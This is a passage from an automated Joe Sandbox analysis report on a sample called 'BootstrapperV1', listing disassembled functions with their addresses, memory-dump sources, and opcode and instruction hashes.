                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf1fbc47f97e2c673b209345b8e2a00865a48f3c3b0b08a86abc59b16c71abb9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2512EB0D1861D8FE7A9EB68C8997A8B7E1FF58341F1041E9940DE3292CE346D828F54
                                                                                                                                                                                                                                              Function 00007FFB4B0ED9B0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: s`
                                                                                                                                                                                                                                              • API String ID: 0-2912018417
                                                                                                                                                                                                                                              • Opcode ID: 63b0031c1da10af21b89e745face57a7c9f6a12145f42938000cb419ca1f34b8
                                                                                                                                                                                                                                              • Instruction ID: 0e49a478fa5ccf25d0da3b48d698624fffdb0899ef97cb7aa63a0f9e910e8c8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63b0031c1da10af21b89e745face57a7c9f6a12145f42938000cb419ca1f34b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA21937051DE868FDB56EF38C054E62BBE1EF55300B1886EDD05AC72B2D925E846C750
                                                                                                                                                                                                                                              Function 00007FFB4B0F6150 Relevance: .6, Instructions: 613COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4cdf9321f5ac9e7cf6f72b96748ef82d80f2465cbf9224fb2f9ac6eb50cb7554
                                                                                                                                                                                                                                              • Instruction ID: 9c85f9f01bc3c29fd0b4b0857638cca46b53b7a98f503d34b0cfbf49ead38167
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cdf9321f5ac9e7cf6f72b96748ef82d80f2465cbf9224fb2f9ac6eb50cb7554
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52020871A0CB894FDB55EF38D8559B97BE1EF9A311B0441BED48AC72A3DD24AC02C781
                                                                                                                                                                                                                                              Function 00007FFB4B0EF7A6 Relevance: .6, Instructions: 564COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 6e516abf6138e602a1fe23fbab7650af80db15b2dd00ae57e4918e04668f21f5
                                                                                                                                                                                                                                              • Instruction ID: f8074ab747e864a31e49df45ab7ff2b4c6318b7064283a3e912a45e0710d7d0f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e516abf6138e602a1fe23fbab7650af80db15b2dd00ae57e4918e04668f21f5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB02D4B161CB895FE754EF28C4556AAB7D2FF98301F1485BDE48DC32A2DE34A841C742
                                                                                                                                                                                                                                              Function 00007FFB4B0E6120 Relevance: .6, Instructions: 558COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d3ea3235182cedd3d18922c14e624c3ff791f698052e0723d1a1b234b9bd77bf
                                                                                                                                                                                                                                              • Instruction ID: 41260cf8a4a8101e81e7a617dc1283b9f40b15425956a1ec7926beecccab9944
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ea3235182cedd3d18922c14e624c3ff791f698052e0723d1a1b234b9bd77bf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E02C4B061CB899FE754EF28C4556AAB7D2FF98301F54857DE48DC32A2DE34A8418742
                                                                                                                                                                                                                                              Function 00007FFB4B0E47D5 Relevance: .6, Instructions: 558COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b19b1eadae14bea273759423504204064efaf490edb618116b14de90c2640093
                                                                                                                                                                                                                                              • Instruction ID: 6ac19fd013dd853de839afa324fbb85139f31f5e34177757c291ba52d9d7cb09
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b19b1eadae14bea273759423504204064efaf490edb618116b14de90c2640093
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F10971B0CB494FEB69EE2CD846AB97BD1EF99311F0441BFE149C32A2DA54AC41C781
                                                                                                                                                                                                                                              Function 00007FFB4B0F693D Relevance: .5, Instructions: 529COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 342305a0f243046807bd6378cdd7250b25644c40434ce7807745c354d5565424
                                                                                                                                                                                                                                              • Instruction ID: 8a6dd5f95165d06300e4db639632fe909ee4b6ab1942b08d3a8982ea747d917d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 342305a0f243046807bd6378cdd7250b25644c40434ce7807745c354d5565424
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02E127A1B1CA495FEB59AF7C94566B93BD1EF59351B0481FAD08DC32E3DC28A842C381
                                                                                                                                                                                                                                              Function 00007FFB4B0FF700 Relevance: .5, Instructions: 528COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ee1539bc2f97bdffcd845c70ad068191c4b6cc8ea32ce6ff2f66576e1b775d90
                                                                                                                                                                                                                                              • Instruction ID: 6c4d3a7fdb55f16a60e8cbc21f5a2e89e0612a4c2101fce8294571933df18749
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee1539bc2f97bdffcd845c70ad068191c4b6cc8ea32ce6ff2f66576e1b775d90
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26219DA650F7C10EE7076B7898665E97FA0EF93210B4D81EBD5D4CB2E3C958480AC363
                                                                                                                                                                                                                                              Function 00007FFB4B0E7A58 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7a2551a56ac295601e22dc48b0bf38d29d1f2eaa3c7af20339005aab6d1e98cc
                                                                                                                                                                                                                                              • Instruction ID: 9c8cb27660dde354e4b77a3c972240954ee9eef6c0eb880c0d5ea65cbd35d6b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a2551a56ac295601e22dc48b0bf38d29d1f2eaa3c7af20339005aab6d1e98cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73D136B1B1C94E4FEB99FE2CC846A7837D1EF95351B0041B9D84EC72A3ED54AC528781
                                                                                                                                                                                                                                              Function 00007FFB4B0E0AA0 Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 56e022e7c7519e8732feda695b147ac3f09ed00ebdbb36b167668026f44c7144
                                                                                                                                                                                                                                              • Instruction ID: 57dfe116fb91fb2aacb86c48a85daae09a1950c6cbc8d70962d28b96b364b8ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e022e7c7519e8732feda695b147ac3f09ed00ebdbb36b167668026f44c7144
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E1C1B0A0D5895FEB59EBB8C4566ADBBE1EF45301F1444FDC08EC76A3EE286846C700
                                                                                                                                                                                                                                              Function 00007FFB4B0F684C Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bb71a05984f71e2b23372ccd7dfac62f8ddddb06b3b10207e812216107d3ee3a
                                                                                                                                                                                                                                              • Instruction ID: 95fc35be6e9264f60a2bb6d7432be02ab282d02cc80688b9f5fdaca4f25433f9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb71a05984f71e2b23372ccd7dfac62f8ddddb06b3b10207e812216107d3ee3a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CC1F7A1B1DA495FEB95EB3CC4596B93BD2EF9925170540FED08EC73A3DD28AC028341
                                                                                                                                                                                                                                              Function 00007FFB4B0E95FA Relevance: .4, Instructions: 424COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7d33e4f66378369523f36083aa8772529386f84a0dad6c68e601b8d2d19cc8c7
                                                                                                                                                                                                                                              • Instruction ID: 7779eac1c0bdf1e9cd60ef0ceaa65905749811126b823ca31ae8690d53ceafdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d33e4f66378369523f36083aa8772529386f84a0dad6c68e601b8d2d19cc8c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E153B1D196499FEB99EF2CC8897AC77A1EF58301F0041FAD54DD72A2CE3859828B50
                                                                                                                                                                                                                                              Function 00007FFB4B0F4EF9 Relevance: .4, Instructions: 402COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e3e13a51ea1b853c4216213a8df754f8140b64daf7b0ec8e62df55327bd33d0a
                                                                                                                                                                                                                                              • Instruction ID: 1c72935eccc6d9980d06c736c38688e9e947a408e949c4bc19d113cf70d42a14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3e13a51ea1b853c4216213a8df754f8140b64daf7b0ec8e62df55327bd33d0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC117A1F1C6424AE725BA38C6915BD77D1FF85302F25C1BAC68EC72E2DC9CB8424395
                                                                                                                                                                                                                                              Function 00007FFB4B0F0D46 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bcd44b46ed34447e42011afa5880533021bbf6606c734db61dd15d01c24131b1
                                                                                                                                                                                                                                              • Instruction ID: 244f1203d1b693cb32961f23b64a732c9c14ca5e8ae8dd3b2466d70af0ef08d9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd44b46ed34447e42011afa5880533021bbf6606c734db61dd15d01c24131b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FC136A1B0DA891FE795EF7CD465AA43FD1EF9A241B0841FED58CC72A3DD649802C340
                                                                                                                                                                                                                                              Function 00007FFB4B0ECC9F Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c2c8180721263c0e851b75a503181f8a6dd7ad5d4236ee740000808641f95a09
                                                                                                                                                                                                                                              • Instruction ID: beebe0a0d8aebbc2879f131f89ceeea1189f7d6da53eef7961b719df94d78de7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2c8180721263c0e851b75a503181f8a6dd7ad5d4236ee740000808641f95a09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FB1C261A1CE495FEBA5FF38C044AA577D1EF68301B0481FAD84ECB2A7DD29E845C780
                                                                                                                                                                                                                                              Function 00007FFB4B0E70B8 Relevance: .3, Instructions: 339COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b6d772f73b6dc30c1c82e017bacc2196c5862e5bdac54615c6c5eaceeb05b777
                                                                                                                                                                                                                                              • Instruction ID: 142b37b4b0525d30b2ff481c52c0f8edd0126bb87b979c7b60ed2d020a4b732e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6d772f73b6dc30c1c82e017bacc2196c5862e5bdac54615c6c5eaceeb05b777
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44A13871B0CA494FEB98EE28C455AB977E1FF99301F0440BDE58DC73A2DE65A846C740
                                                                                                                                                                                                                                              Function 00007FFB4B0F9851 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d7f43a03eb46d43c46e74e1ce608614e2510243d0877db3aee824c1b507ff02
                                                                                                                                                                                                                                              • Instruction ID: bf03789a303729913699df6b0f58421f02565425157d9d03f9323df10580c576
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d7f43a03eb46d43c46e74e1ce608614e2510243d0877db3aee824c1b507ff02
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFB1D57060CA4D5FDB98EF2CD495AA97BE2FF69314F0541B9E44DC72A2DE68E802C740
                                                                                                                                                                                                                                              Function 00007FFB4B0F29D0 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d6af0a915b5696d02eb795b46d2d73dc7b01d46c6eec60d7a20d677b5b83ab7a
                                                                                                                                                                                                                                              • Instruction ID: a6a11ed9c5ed00c19501c79aff7b4470ffba2d2c357b8c96318535be853d65ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6af0a915b5696d02eb795b46d2d73dc7b01d46c6eec60d7a20d677b5b83ab7a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E812B92B1CE0E0FF7D8EA7CE85967577C2EF98652B1442BAD44DC33A6DC19AC424381
                                                                                                                                                                                                                                              Function 00007FFB4B0E6B99 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0c5244567592d71b9afaa855d22ca5f5065a27c4c172e5f58964513756cd2b9f
                                                                                                                                                                                                                                              • Instruction ID: ef36250195be8b83da254e9e59c29368af63dc8fec48b484b40395edfb5017c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c5244567592d71b9afaa855d22ca5f5065a27c4c172e5f58964513756cd2b9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 239169A290EBC91FE7479B7898751A57FB0AF0724170D41EBC4C8CF2A7D91CA80AC352
                                                                                                                                                                                                                                              Function 00007FFB4B0EBFA0 Relevance: .3, Instructions: 316COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fe760e85c2137f67c9925999a1d296217fce50eb5a6dea726aa8d0277860e8e1
                                                                                                                                                                                                                                              • Instruction ID: 3b3fbfd573f4b39ba3e51961f85bfff3e1261e7d02b8a72d53cc297d83ae703c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe760e85c2137f67c9925999a1d296217fce50eb5a6dea726aa8d0277860e8e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7781256171CD091FE6A9BA2CE8597B937C1EF89322B0541FAE44DC73A6DD19AC428381
                                                                                                                                                                                                                                              Function 00007FFB4B0F0A30 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e65f2a417cbcf8cfdd855b72aa291304bd4fd5855de5a41d04a30b6444df4a53
                                                                                                                                                                                                                                              • Instruction ID: 327e81ee3f56f7cd7ed7dd5b10b31502bb0033574f397016091f2ceaca03441b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e65f2a417cbcf8cfdd855b72aa291304bd4fd5855de5a41d04a30b6444df4a53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F9107B1A0CA8E8FDB85EF7CC495AED7BE1FF59311B0441BAD54DD7292DE24A8018780
                                                                                                                                                                                                                                              Function 00007FFB4B0FB865 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: caf90d10ac86ec657284c91822cca5eabdcb9bb0014652297daaf1ae48a4e141
                                                                                                                                                                                                                                              • Instruction ID: fe9e1d5cc4ed080056c34ad4e824702f22f83cd58a351a2220ec800dd1836383
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caf90d10ac86ec657284c91822cca5eabdcb9bb0014652297daaf1ae48a4e141
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C81257160DB4A4FE355EF2CD84597077E0EF96321B1882BED18DC72A3D969A843CB41
                                                                                                                                                                                                                                              Function 00007FFB4B0E70BD Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 258f36a7e82a9d7db5a855123d367dbca95d8e8a08e79924c16e2409a6991fdf
                                                                                                                                                                                                                                              • Instruction ID: c9cd56f57c7498731d4d4cce7f8bd4311669829364c2f274efdb0ccd4c74b78e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 258f36a7e82a9d7db5a855123d367dbca95d8e8a08e79924c16e2409a6991fdf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A181EA71A0CA585FDB59EF6CD8955A97BE0FFA8711B04017FE54AC7361DD20A802C7C2
                                                                                                                                                                                                                                              Function 00007FFB4B0FABF2 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1f62afbd2800118bb01044c002b682a6c20573885e3ef2270aa3aa808162b5fe
                                                                                                                                                                                                                                              • Instruction ID: 438035ba9b8f017b531dc8d7be27afe0d7ec87c0c787edd912464ffa67f6167a
